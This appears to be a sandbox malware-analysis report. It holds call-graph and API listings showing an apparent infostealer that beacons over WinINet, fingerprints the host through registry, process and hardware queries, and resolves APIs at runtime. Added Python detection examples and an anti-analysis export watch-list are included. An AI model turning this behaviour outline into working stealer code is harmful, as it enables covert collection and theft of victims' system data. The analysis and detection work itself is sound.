14607 1b41f3 14606->14607 14608 1b45c0 2 API calls 14607->14608 14609 1b420c 14608->14609 14610 1b45c0 2 API calls 14609->14610 14611 1b4225 14610->14611 14612 1b45c0 2 API calls 14611->14612 14613 1b423e 14612->14613 14614 1b45c0 2 API calls 14613->14614 14615 1b4257 14614->14615 14616 1b45c0 2 API calls 14615->14616 14617 1b4270 14616->14617 14618 1b45c0 2 API calls 14617->14618 14619 1b4289 14618->14619 14620 1b45c0 2 API calls 14619->14620 14621 1b42a2 14620->14621 14622 1b45c0 2 API calls 14621->14622 14623 1b42bb 14622->14623 14624 1b45c0 2 API calls 14623->14624 14625 1b42d4 14624->14625 14626 1b45c0 2 API calls 14625->14626 14627 1b42ed 14626->14627 14628 1b45c0 2 API calls 14627->14628 14629 1b4306 14628->14629 14630 1b45c0 2 API calls 14629->14630 14631 1b431f 14630->14631 14632 1b45c0 2 API calls 14631->14632 14633 1b4338 14632->14633 14634 1b45c0 2 API calls 14633->14634 14635 1b4351 14634->14635 14636 1b45c0 2 API calls 14635->14636 14637 1b436a 14636->14637 14638 1b45c0 2 API calls 14637->14638 14639 1b4383 14638->14639 14640 1b45c0 2 API calls 14639->14640 14641 1b439c 14640->14641 14642 1b45c0 2 API calls 14641->14642 14643 1b43b5 14642->14643 14644 1b45c0 2 API calls 14643->14644 14645 1b43ce 14644->14645 14646 1b45c0 2 API calls 14645->14646 14647 1b43e7 14646->14647 14648 1b45c0 2 API calls 14647->14648 14649 1b4400 14648->14649 14650 1b45c0 2 API calls 14649->14650 14651 1b4419 14650->14651 14652 1b45c0 2 API calls 14651->14652 14653 1b4432 14652->14653 14654 1b45c0 2 API calls 14653->14654 14655 1b444b 14654->14655 14656 1b45c0 2 API calls 14655->14656 14657 1b4464 14656->14657 14658 1b45c0 2 API calls 14657->14658 14659 1b447d 14658->14659 14660 1b45c0 2 API calls 14659->14660 14661 1b4496 14660->14661 14662 1b45c0 2 API calls 14661->14662 14663 1b44af 14662->14663 14664 1b45c0 2 API calls 14663->14664 14665 1b44c8 14664->14665 14666 1b45c0 2 API calls 14665->14666 14667 1b44e1 14666->14667 14668 1b45c0 2 API calls 14667->14668 14669 1b44fa 
14668->14669 14670 1b45c0 2 API calls 14669->14670 14671 1b4513 14670->14671 14672 1b45c0 2 API calls 14671->14672 14673 1b452c 14672->14673 14674 1b45c0 2 API calls 14673->14674 14675 1b4545 14674->14675 14676 1b45c0 2 API calls 14675->14676 14677 1b455e 14676->14677 14678 1b45c0 2 API calls 14677->14678 14679 1b4577 14678->14679 14680 1b45c0 2 API calls 14679->14680 14681 1b4590 14680->14681 14682 1b45c0 2 API calls 14681->14682 14683 1b45a9 14682->14683 14684 1c9c10 14683->14684 14685 1ca036 8 API calls 14684->14685 14686 1c9c20 43 API calls 14684->14686 14687 1ca0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14685->14687 14688 1ca146 14685->14688 14686->14685 14687->14688 14689 1ca216 14688->14689 14690 1ca153 8 API calls 14688->14690 14691 1ca21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14689->14691 14692 1ca298 14689->14692 14690->14689 14691->14692 14693 1ca2a5 6 API calls 14692->14693 14694 1ca337 14692->14694 14693->14694 14695 1ca41f 14694->14695 14696 1ca344 9 API calls 14694->14696 14697 1ca428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14695->14697 14698 1ca4a2 14695->14698 14696->14695 14697->14698 14699 1ca4dc 14698->14699 14700 1ca4ab GetProcAddress GetProcAddress 14698->14700 14701 1ca515 14699->14701 14702 1ca4e5 GetProcAddress GetProcAddress 14699->14702 14700->14699 14703 1ca612 14701->14703 14704 1ca522 10 API calls 14701->14704 14702->14701 14705 1ca67d 14703->14705 14706 1ca61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14703->14706 14704->14703 14707 1ca69e 14705->14707 14708 1ca686 GetProcAddress 14705->14708 14706->14705 14709 1c5ca3 14707->14709 14710 1ca6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14707->14710 14708->14707 14711 1b1590 14709->14711 14710->14709 15832 1b1670 14711->15832 14714 1ca7a0 lstrcpy 14715 1b15b5 14714->14715 14716 1ca7a0 lstrcpy 14715->14716 14717 1b15c7 14716->14717 14718 1ca7a0 
lstrcpy 14717->14718 14719 1b15d9 14718->14719 14720 1ca7a0 lstrcpy 14719->14720 14721 1b1663 14720->14721 14722 1c5510 14721->14722 14723 1c5521 14722->14723 14724 1ca820 2 API calls 14723->14724 14725 1c552e 14724->14725 14726 1ca820 2 API calls 14725->14726 14727 1c553b 14726->14727 14728 1ca820 2 API calls 14727->14728 14729 1c5548 14728->14729 14730 1ca740 lstrcpy 14729->14730 14731 1c5555 14730->14731 14732 1ca740 lstrcpy 14731->14732 14733 1c5562 14732->14733 14734 1ca740 lstrcpy 14733->14734 14735 1c556f 14734->14735 14736 1ca740 lstrcpy 14735->14736 14775 1c557c 14736->14775 14737 1c5643 StrCmpCA 14737->14775 14738 1c56a0 StrCmpCA 14739 1c57dc 14738->14739 14738->14775 14740 1ca8a0 lstrcpy 14739->14740 14741 1c57e8 14740->14741 14742 1ca820 2 API calls 14741->14742 14743 1c57f6 14742->14743 14746 1ca820 2 API calls 14743->14746 14744 1c5856 StrCmpCA 14747 1c5991 14744->14747 14744->14775 14745 1ca740 lstrcpy 14745->14775 14749 1c5805 14746->14749 14748 1ca8a0 lstrcpy 14747->14748 14751 1c599d 14748->14751 14752 1b1670 lstrcpy 14749->14752 14750 1b1590 lstrcpy 14750->14775 14754 1ca820 2 API calls 14751->14754 14776 1c5811 14752->14776 14753 1ca820 lstrlen lstrcpy 14753->14775 14756 1c59ab 14754->14756 14755 1c52c0 25 API calls 14755->14775 14760 1ca820 2 API calls 14756->14760 14757 1c5a0b StrCmpCA 14758 1c5a28 14757->14758 14759 1c5a16 Sleep 14757->14759 14761 1ca8a0 lstrcpy 14758->14761 14759->14775 14762 1c59ba 14760->14762 14763 1c5a34 14761->14763 14764 1b1670 lstrcpy 14762->14764 14765 1ca820 2 API calls 14763->14765 14764->14776 14766 1c5a43 14765->14766 14767 1ca820 2 API calls 14766->14767 14768 1c5a52 14767->14768 14771 1b1670 lstrcpy 14768->14771 14769 1ca8a0 lstrcpy 14769->14775 14770 1c578a StrCmpCA 14770->14775 14771->14776 14772 1ca7a0 lstrcpy 14772->14775 14773 1c593f StrCmpCA 14773->14775 14774 1c51f0 20 API calls 14774->14775 14775->14737 14775->14738 14775->14744 14775->14745 14775->14750 14775->14753 14775->14755 14775->14757 
14775->14769 14775->14770 14775->14772 14775->14773 14775->14774 14776->13829 14778 1c754c 14777->14778 14779 1c7553 GetVolumeInformationA 14777->14779 14778->14779 14783 1c7591 14779->14783 14780 1c75fc GetProcessHeap RtlAllocateHeap 14781 1c7628 wsprintfA 14780->14781 14782 1c7619 14780->14782 14785 1ca740 lstrcpy 14781->14785 14784 1ca740 lstrcpy 14782->14784 14783->14780 14786 1c5da7 14784->14786 14785->14786 14786->13850 14788 1ca7a0 lstrcpy 14787->14788 14789 1b4899 14788->14789 15841 1b47b0 14789->15841 14791 1b48a5 14792 1ca740 lstrcpy 14791->14792 14793 1b48d7 14792->14793 14794 1ca740 lstrcpy 14793->14794 14795 1b48e4 14794->14795 14796 1ca740 lstrcpy 14795->14796 14797 1b48f1 14796->14797 14798 1ca740 lstrcpy 14797->14798 14799 1b48fe 14798->14799 14800 1ca740 lstrcpy 14799->14800 14801 1b490b InternetOpenA StrCmpCA 14800->14801 14802 1b4944 14801->14802 14803 1b4ecb InternetCloseHandle 14802->14803 15847 1c8b60 14802->15847 14804 1b4ee8 14803->14804 15862 1b9ac0 CryptStringToBinaryA 14804->15862 14806 1b4963 15855 1ca920 14806->15855 14809 1b4976 14811 1ca8a0 lstrcpy 14809->14811 14816 1b497f 14811->14816 14812 1ca820 2 API calls 14813 1b4f05 14812->14813 14815 1ca9b0 4 API calls 14813->14815 14814 1b4f27 codecvt 14818 1ca7a0 lstrcpy 14814->14818 14817 1b4f1b 14815->14817 14820 1ca9b0 4 API calls 14816->14820 14819 1ca8a0 lstrcpy 14817->14819 14831 1b4f57 14818->14831 14819->14814 14821 1b49a9 14820->14821 14822 1ca8a0 lstrcpy 14821->14822 14823 1b49b2 14822->14823 14824 1ca9b0 4 API calls 14823->14824 14825 1b49d1 14824->14825 14826 1ca8a0 lstrcpy 14825->14826 14827 1b49da 14826->14827 14828 1ca920 3 API calls 14827->14828 14829 1b49f8 14828->14829 14830 1ca8a0 lstrcpy 14829->14830 14832 1b4a01 14830->14832 14831->13853 14833 1ca9b0 4 API calls 14832->14833 14834 1b4a20 14833->14834 14835 1ca8a0 lstrcpy 14834->14835 14836 1b4a29 14835->14836 14837 1ca9b0 4 API calls 14836->14837 14838 1b4a48 14837->14838 14839 1ca8a0 lstrcpy 14838->14839 14840 1b4a51 
14839->14840 14841 1ca9b0 4 API calls 14840->14841 14842 1b4a7d 14841->14842 14843 1ca920 3 API calls 14842->14843 14844 1b4a84 14843->14844 14845 1ca8a0 lstrcpy 14844->14845 14846 1b4a8d 14845->14846 14847 1b4aa3 InternetConnectA 14846->14847 14847->14803 14848 1b4ad3 HttpOpenRequestA 14847->14848 14850 1b4b28 14848->14850 14851 1b4ebe InternetCloseHandle 14848->14851 14852 1ca9b0 4 API calls 14850->14852 14851->14803 14853 1b4b3c 14852->14853 14854 1ca8a0 lstrcpy 14853->14854 14855 1b4b45 14854->14855 14856 1ca920 3 API calls 14855->14856 14857 1b4b63 14856->14857 14858 1ca8a0 lstrcpy 14857->14858 14859 1b4b6c 14858->14859 14860 1ca9b0 4 API calls 14859->14860 14861 1b4b8b 14860->14861 14862 1ca8a0 lstrcpy 14861->14862 14863 1b4b94 14862->14863 14864 1ca9b0 4 API calls 14863->14864 14865 1b4bb5 14864->14865 14866 1ca8a0 lstrcpy 14865->14866 14867 1b4bbe 14866->14867 14868 1ca9b0 4 API calls 14867->14868 14869 1b4bde 14868->14869 14870 1ca8a0 lstrcpy 14869->14870 14871 1b4be7 14870->14871 14872 1ca9b0 4 API calls 14871->14872 14873 1b4c06 14872->14873 14874 1ca8a0 lstrcpy 14873->14874 14875 1b4c0f 14874->14875 14876 1ca920 3 API calls 14875->14876 14877 1b4c2d 14876->14877 14878 1ca8a0 lstrcpy 14877->14878 14879 1b4c36 14878->14879 14880 1ca9b0 4 API calls 14879->14880 14881 1b4c55 14880->14881 14882 1ca8a0 lstrcpy 14881->14882 14883 1b4c5e 14882->14883 14884 1ca9b0 4 API calls 14883->14884 14885 1b4c7d 14884->14885 14886 1ca8a0 lstrcpy 14885->14886 14887 1b4c86 14886->14887 14888 1ca920 3 API calls 14887->14888 14889 1b4ca4 14888->14889 14890 1ca8a0 lstrcpy 14889->14890 14891 1b4cad 14890->14891 14892 1ca9b0 4 API calls 14891->14892 14893 1b4ccc 14892->14893 14894 1ca8a0 lstrcpy 14893->14894 14895 1b4cd5 14894->14895 14896 1ca9b0 4 API calls 14895->14896 14897 1b4cf6 14896->14897 14898 1ca8a0 lstrcpy 14897->14898 14899 1b4cff 14898->14899 14900 1ca9b0 4 API calls 14899->14900 14901 1b4d1f 14900->14901 14902 1ca8a0 lstrcpy 14901->14902 14903 1b4d28 14902->14903 
14904 1ca9b0 4 API calls 14903->14904 14905 1b4d47 14904->14905 14906 1ca8a0 lstrcpy 14905->14906 14907 1b4d50 14906->14907 14908 1ca920 3 API calls 14907->14908 14909 1b4d6e 14908->14909 14910 1ca8a0 lstrcpy 14909->14910 14911 1b4d77 14910->14911 14912 1ca740 lstrcpy 14911->14912 14913 1b4d92 14912->14913 14914 1ca920 3 API calls 14913->14914 14915 1b4db3 14914->14915 14916 1ca920 3 API calls 14915->14916 14917 1b4dba 14916->14917 14918 1ca8a0 lstrcpy 14917->14918 14919 1b4dc6 14918->14919 14920 1b4de7 lstrlen 14919->14920 14921 1b4dfa 14920->14921 14922 1b4e03 lstrlen 14921->14922 15861 1caad0 14922->15861 14924 1b4e13 HttpSendRequestA 14925 1b4e32 InternetReadFile 14924->14925 14926 1b4e67 InternetCloseHandle 14925->14926 14931 1b4e5e 14925->14931 14929 1ca800 14926->14929 14928 1ca9b0 4 API calls 14928->14931 14929->14851 14930 1ca8a0 lstrcpy 14930->14931 14931->14925 14931->14926 14931->14928 14931->14930 15868 1caad0 14932->15868 14934 1c17c4 StrCmpCA 14935 1c17cf ExitProcess 14934->14935 14939 1c17d7 14934->14939 14936 1c19c2 14936->13855 14937 1c185d StrCmpCA 14937->14939 14938 1c187f StrCmpCA 14938->14939 14939->14936 14939->14937 14939->14938 14940 1c1970 StrCmpCA 14939->14940 14941 1c18f1 StrCmpCA 14939->14941 14942 1c1951 StrCmpCA 14939->14942 14943 1c1932 StrCmpCA 14939->14943 14944 1c1913 StrCmpCA 14939->14944 14945 1c18ad StrCmpCA 14939->14945 14946 1c18cf StrCmpCA 14939->14946 14947 1ca820 lstrlen lstrcpy 14939->14947 14940->14939 14941->14939 14942->14939 14943->14939 14944->14939 14945->14939 14946->14939 14947->14939 14949 1ca7a0 lstrcpy 14948->14949 14950 1b5979 14949->14950 14951 1b47b0 2 API calls 14950->14951 14952 1b5985 14951->14952 14953 1ca740 lstrcpy 14952->14953 14954 1b59ba 14953->14954 14955 1ca740 lstrcpy 14954->14955 14956 1b59c7 14955->14956 14957 1ca740 lstrcpy 14956->14957 14958 1b59d4 14957->14958 14959 1ca740 lstrcpy 14958->14959 14960 1b59e1 14959->14960 14961 1ca740 lstrcpy 14960->14961 14962 1b59ee InternetOpenA StrCmpCA 
[Call-graph viewer data (node and edge list, continued from the preceding part of the report) omitted. The API sequences recoverable from it, in the order the edges give them:]
• C2 request path: InternetOpenA followed by StrCmpCA; GetSystemTime is read while the request string is assembled; then InternetConnectA → HttpOpenRequestA → HttpSendRequestA → InternetReadFile (looped until the read loop exits) → InternetCloseHandle. A failed InternetConnectA or HttpOpenRequestA branches straight to InternetCloseHandle. Between the WinINet calls the buffers are built with repeated lstrcpy, lstrlen and lstrcat helpers and GetProcessHeap + RtlAllocateHeap. A second download path uses InternetOpenUrlA → InternetReadFile → InternetCloseHandle (twice), and URLs are split with InternetCrackUrlA after an lstrlen.
• Host fingerprinting, each value appended to the report string via lstrcpy/lstrcat: GetCurrentProcess + IsWow64Process; GetLocalTime + wsprintfA; GetTimeZoneInformation + wsprintfA; GetUserDefaultLocaleName (converted with LocalAlloc + CharToOemW); GetKeyboardLayoutList (twice, around a LocalAlloc) + GetLocaleInfoA per layout; GetSystemPowerStatus; GetCurrentProcessId → OpenProcess → GetModuleFileNameExA → CloseHandle; RegOpenKeyExA → RegQueryValueExA → RegCloseKey; GetLogicalProcessorInformationEx (retried after GetLastError with a larger GetProcessHeap/RtlAllocateHeap buffer) + wsprintfA; GetSystemInfo + wsprintfA; GlobalMemoryStatusEx + __aulldiv + wsprintfA; installed-software enumeration via RegOpenKeyExA → RegEnumKeyExA → wsprintfA + RegOpenKeyExA → RegQueryValueExA (twice) → RegCloseKey; running-process enumeration via CreateToolhelp32Snapshot → Process32First → Process32Next → CloseHandle.
• Encoding helpers: CryptBinaryToStringA called twice around a GetProcessHeap + RtlAllocateHeap (size query, then encode); CryptStringToBinaryA between LocalAlloc and LocalFree.
• Manual module loading: VirtualAlloc (twice) → LoadLibraryA → GetProcAddress in a loop, with VirtualFree and FreeLibrary on teardown; heap helpers pair GetProcessHeap with RtlAllocateHeap or HeapFree.
• Also present: StrCmpCA comparisons in the dispatch routines, LocalAlloc, and the C++ runtime helper codecvt.
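The call-graph data above gives the WinINet request chain, the process and registry enumeration chains, and a manual module-load chain as ordered API sequences with string-glue calls interleaved, plus a failure edge where InternetConnectA goes straight to InternetCloseHandle. The Python below is an added example (not code from this report, from Joe Sandbox or from the sample) that checks such ordered chains against a flat call trace, tolerating unrelated calls between steps, optionally bounding how spread out a match may be, and reporting how far an incomplete chain got. The chain definitions, the window parameter and both traces are this example's own; the traces are constructed to follow the edge order listed above.

```python
# Ordered API chains recoverable from the call graph above. Names only; an unrelated
# call may sit between two steps, which is how the graph shows them (lstrcpy/lstrlen
# glue between every WinINet call). These chain definitions are this example's own.
CHAINS = {
    "wininet_beacon": ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                       "HttpSendRequestA", "InternetReadFile", "InternetCloseHandle"],
    "process_enumeration": ["CreateToolhelp32Snapshot", "Process32First",
                            "Process32Next", "CloseHandle"],
    "installed_software_enum": ["RegOpenKeyExA", "RegEnumKeyExA",
                                "RegQueryValueExA", "RegCloseKey"],
    "manual_module_load": ["VirtualAlloc", "LoadLibraryA", "GetProcAddress"],
}

# Constructed call trace that follows the edge order of the graph above.
SAMPLE_TRACE = [
    "InternetOpenA", "StrCmpCA", "GetSystemTime", "lstrcpy", "InternetConnectA",
    "HttpOpenRequestA", "lstrlen", "GetProcessHeap", "RtlAllocateHeap",
    "HttpSendRequestA", "InternetReadFile", "InternetReadFile",
    "InternetCloseHandle", "InternetCloseHandle",
    "GetCurrentProcess", "IsWow64Process", "GetLocalTime", "GetTimeZoneInformation",
    "GetUserDefaultLocaleName", "GetKeyboardLayoutList", "GetSystemPowerStatus",
    "GetLogicalProcessorInformationEx", "GetSystemInfo", "GlobalMemoryStatusEx",
    "RegOpenKeyExA", "RegEnumKeyExA", "RegOpenKeyExA", "RegQueryValueExA", "RegCloseKey",
    "CreateToolhelp32Snapshot", "Process32First", "Process32Next", "Process32Next",
    "CloseHandle", "CryptBinaryToStringA",
]

# Constructed trace for the failure edge in the graph: InternetConnectA fails and the
# code goes straight to InternetCloseHandle without ever sending a request.
FAILED_CONNECT_TRACE = ["InternetOpenA", "StrCmpCA", "InternetConnectA", "InternetCloseHandle"]


def match_chain(trace, chain, window=None):
    """Return the trace indices at which the chain's steps occur in order, or None.

    Other calls may be interleaved. If `window` is given, the whole chain must fit
    within that many calls of its first step; every occurrence of the first step is
    tried, so an early unrelated occurrence does not hide a later tight match."""
    for first in (i for i, api in enumerate(trace) if api == chain[0]):
        positions, start = [first], first + 1
        for step in chain[1:]:
            try:
                idx = trace.index(step, start)
            except ValueError:
                return None        # step never occurs after here; later starts cannot help
            positions.append(idx)
            start = idx + 1
        if window is None or positions[-1] - positions[0] <= window:
            return positions
    return None


def longest_prefix(trace, chain):
    """How many leading steps of the chain appear in order. Useful when a chain does not
    complete: the failed-connect trace scores 2 of 6 for the beacon chain."""
    count, start = 0, 0
    for step in chain:
        try:
            start = trace.index(step, start) + 1
        except ValueError:
            break
        count += 1
    return count


def classify_trace(trace, chains=CHAINS, window=None):
    """Map each chain name to its match positions (or None) for one trace."""
    return {name: match_chain(trace, chain, window) for name, chain in chains.items()}


if __name__ == "__main__":
    for name, hit in classify_trace(SAMPLE_TRACE).items():
        print(f"{name}: {hit}")
    beacon = CHAINS["wininet_beacon"]
    print("failed connect reached step", longest_prefix(FAILED_CONNECT_TRACE, beacon),
          "of", len(beacon))
```

Matching on names alone is deliberately loose; the window argument is what keeps a long trace from matching a chain by accident, and the prefix score is what distinguishes "never tried to beacon" from "tried and the connection failed", which is the difference the graph's failure edge encodes.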

                              Control-flow Graph

                              [Graph-viewer data omitted. Blocks recovered from it: 1c9860-1c9874 (calls 1c9750) branches either into 1c987a-1c9a8e (calls 1c9780, then GetProcAddress ×21) or directly to 1c9a93-1c9af2 (LoadLibraryA ×5). After the loads, each further GetProcAddress block is behind a conditional branch that can skip it: 1c9af4-1c9b08 (×1), 1c9b16-1c9b41 (×2), 1c9b4f-1c9b63 (×1), 1c9b71-1c9b84 (×1) and 1c9b92-1c9bbc (×2), with the checks at 1c9b0d, 1c9b46, 1c9b68 and 1c9b89; the function exits at 1c9bc1-1c9bc2.]
                              APIs
                              • GetProcAddress.KERNEL32(75900000,00EE0590), ref: 001C98A1
                              • GetProcAddress.KERNEL32(75900000,00EE0608), ref: 001C98BA
                              • GetProcAddress.KERNEL32(75900000,00EE0668), ref: 001C98D2
                              • GetProcAddress.KERNEL32(75900000,00EE05A8), ref: 001C98EA
                              • GetProcAddress.KERNEL32(75900000,00EE0728), ref: 001C9903
                              • GetProcAddress.KERNEL32(75900000,00EE8B48), ref: 001C991B
                              • GetProcAddress.KERNEL32(75900000,00ED53E8), ref: 001C9933
                              • GetProcAddress.KERNEL32(75900000,00ED5348), ref: 001C994C
                              • GetProcAddress.KERNEL32(75900000,00EE0770), ref: 001C9964
                              • GetProcAddress.KERNEL32(75900000,00EE05C0), ref: 001C997C
                              • GetProcAddress.KERNEL32(75900000,00EE07E8), ref: 001C9995
                              • GetProcAddress.KERNEL32(75900000,00EE05D8), ref: 001C99AD
                              • GetProcAddress.KERNEL32(75900000,00ED5388), ref: 001C99C5
                              • GetProcAddress.KERNEL32(75900000,00EE0680), ref: 001C99DE
                              • GetProcAddress.KERNEL32(75900000,00EE05F0), ref: 001C99F6
                              • GetProcAddress.KERNEL32(75900000,00ED52C8), ref: 001C9A0E
                              • GetProcAddress.KERNEL32(75900000,00EE0698), ref: 001C9A27
                              • GetProcAddress.KERNEL32(75900000,00EE0638), ref: 001C9A3F
                              • GetProcAddress.KERNEL32(75900000,00ED5308), ref: 001C9A57
                              • GetProcAddress.KERNEL32(75900000,00EE06B0), ref: 001C9A70
                              • GetProcAddress.KERNEL32(75900000,00ED5208), ref: 001C9A88
                              • LoadLibraryA.KERNEL32(00EE0710,?,001C6A00), ref: 001C9A9A
                              • LoadLibraryA.KERNEL32(00EE06C8,?,001C6A00), ref: 001C9AAB
                              • LoadLibraryA.KERNEL32(00EE06E0,?,001C6A00), ref: 001C9ABD
                              • LoadLibraryA.KERNEL32(00EE07A0,?,001C6A00), ref: 001C9ACF
                              • LoadLibraryA.KERNEL32(00EE0620,?,001C6A00), ref: 001C9AE0
                              • GetProcAddress.KERNEL32(75070000,00EE07B8), ref: 001C9B02
                              • GetProcAddress.KERNEL32(75FD0000,00EE07D0), ref: 001C9B23
                              • GetProcAddress.KERNEL32(75FD0000,00EE8EE8), ref: 001C9B3B
                              • GetProcAddress.KERNEL32(75A50000,00EE8F30), ref: 001C9B5D
                              • GetProcAddress.KERNEL32(74E50000,00ED5248), ref: 001C9B7E
                              • GetProcAddress.KERNEL32(76E80000,00EE8AD8), ref: 001C9B9F
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 001C9BB6
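The API list above records 28 GetProcAddress calls: 21 against the module handle 75900000 with the export name passed as an unresolved string pointer, then five LoadLibraryA calls and seven more GetProcAddress calls against handles that appear only after the loads, the last one naming NtQueryInformationProcess in the module at 76E80000. The Python below is an added example (not Joe Sandbox code and not code from the sample) that parses trace lines in this format and reduces them to what a triage analyst wants: how many resolutions, against how many module bases, whether new bases appear only after LoadLibraryA, how many export names were never resolved to strings, and which resolved names are on a watch-list. The sample lines are a subset copied from the list above; the watch-list and the threshold of five resolutions are this example's assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the "APIs" lines listed for the function above,
# copied in their original order (the full list has 28 GetProcAddress and 5 LoadLibraryA calls).
SAMPLE_TRACE = """\
• GetProcAddress.KERNEL32(75900000,00EE0590), ref: 001C98A1
• GetProcAddress.KERNEL32(75900000,00EE0608), ref: 001C98BA
• GetProcAddress.KERNEL32(75900000,00EE0668), ref: 001C98D2
• LoadLibraryA.KERNEL32(00EE0710,?,001C6A00), ref: 001C9A9A
• LoadLibraryA.KERNEL32(00EE06C8,?,001C6A00), ref: 001C9AAB
• GetProcAddress.KERNEL32(75070000,00EE07B8), ref: 001C9B02
• GetProcAddress.KERNEL32(75FD0000,00EE07D0), ref: 001C9B23
• GetProcAddress.KERNEL32(76E80000,00EE8AD8), ref: 001C9B9F
• GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 001C9BB6
"""

# One trace line: "<api>.<module>(<args>), ref: <address>", optionally preceded by a bullet.
LINE_RE = re.compile(
    r"^\W*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# An argument rendered as eight hex digits is a raw pointer the sandbox did not resolve to a string.
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Assumed watch-list for this example: exports whose runtime lookup is an anti-analysis indicator.
SUSPICIOUS_EXPORTS = {"NtQueryInformationProcess", "NtSetInformationThread", "IsDebuggerPresent"}


def parse_trace(text):
    """Turn report lines into dicts; lines that do not match the format are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in m.group("args").split(",")],
            "ref": int(m.group("ref"), 16),
        })
    return calls


def analyze_api_resolution(calls, min_resolutions=5):
    """Summarise GetProcAddress/LoadLibraryA usage and decide whether it looks like
    deliberate runtime import resolution rather than a few optional lookups."""
    per_module = defaultdict(list)      # hModule -> export names or unresolved pointers
    flagged, order, loads = [], [], 0
    for c in calls:
        if c["api"] == "GetProcAddress" and len(c["args"]) >= 2:
            hmod, name = c["args"][0], c["args"][1]
            per_module[hmod].append(name)
            order.append(hmod)
            if name in SUSPICIOUS_EXPORTS:
                flagged.append((name, c["ref"]))
        elif c["api"] == "LoadLibraryA":
            loads += 1
            order.append(None)           # marker: a library load happened at this point
    # Module bases that only show up after the first LoadLibraryA were obtained at runtime.
    seen_load, before, after = False, set(), set()
    for hmod in order:
        if hmod is None:
            seen_load = True
        elif seen_load:
            after.add(hmod)
        else:
            before.add(hmod)
    total = sum(len(v) for v in per_module.values())
    return {
        "getprocaddress_total": total,
        "loadlibrary_total": loads,
        "module_bases": sorted(per_module),
        "unresolved_name_pointers": sum(1 for names in per_module.values()
                                        for n in names if HEX_RE.match(n)),
        "flagged_exports": flagged,
        "new_bases_after_load": sorted(after - before),
        "dynamic_resolution": total >= min_resolutions and loads > 0 and bool(after - before),
    }


if __name__ == "__main__":
    for key, value in analyze_api_resolution(parse_trace(SAMPLE_TRACE)).items():
        print(f"{key}: {value}")
```

The unresolved-pointer count matters as much as the total: when nearly every export name reaches GetProcAddress as a pointer the sandbox could not render, the names were built at runtime, which is the usual reason the static import table of such a sample says little.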
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HR$HS$NtQueryInformationProcess$S
                              • API String ID: 2238633743-3386072519
                              • Opcode ID: 7ee4707fb22997789634f4d4d4bf703c289d0c055fd189f09e60ed0bf104c70b
                              • Instruction ID: 59da3e1e7c2c722c766be74a9a198a70ab294529f9a4a0f8879701d3f6512987
                              • Opcode Fuzzy Hash: 7ee4707fb22997789634f4d4d4bf703c289d0c055fd189f09e60ed0bf104c70b
                              • Instruction Fuzzy Hash: B0A166F5600A01AFC346EBA9ED88E723BFDE748381F04851AE60DC3324D779A845DB12

                              Control-flow Graph

                              [Graph-viewer data omitted. Blocks recovered from it: 1b45c0-1b4695 (RtlAllocateHeap) enters a loop whose header is 1b46a0-1b46a6 and whose body is 1b46ac-1b474a (back edge to the header); on exit the function runs 1b474f-1b47a9 (VirtualProtect).]
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001B460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 001B479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., 21 xrefs within this function: 001B45C7, 001B45D2, 001B45DD, 001B45E8, 001B45F3, 001B4617, 001B4622, 001B4638, 001B4643, 001B4662, 001B4678, 001B4683, 001B46AC, 001B46B7, 001B46CD, 001B46D8, 001B4713, 001B471E, 001B473F, 001B474F, 001B4765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B46C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001B4734
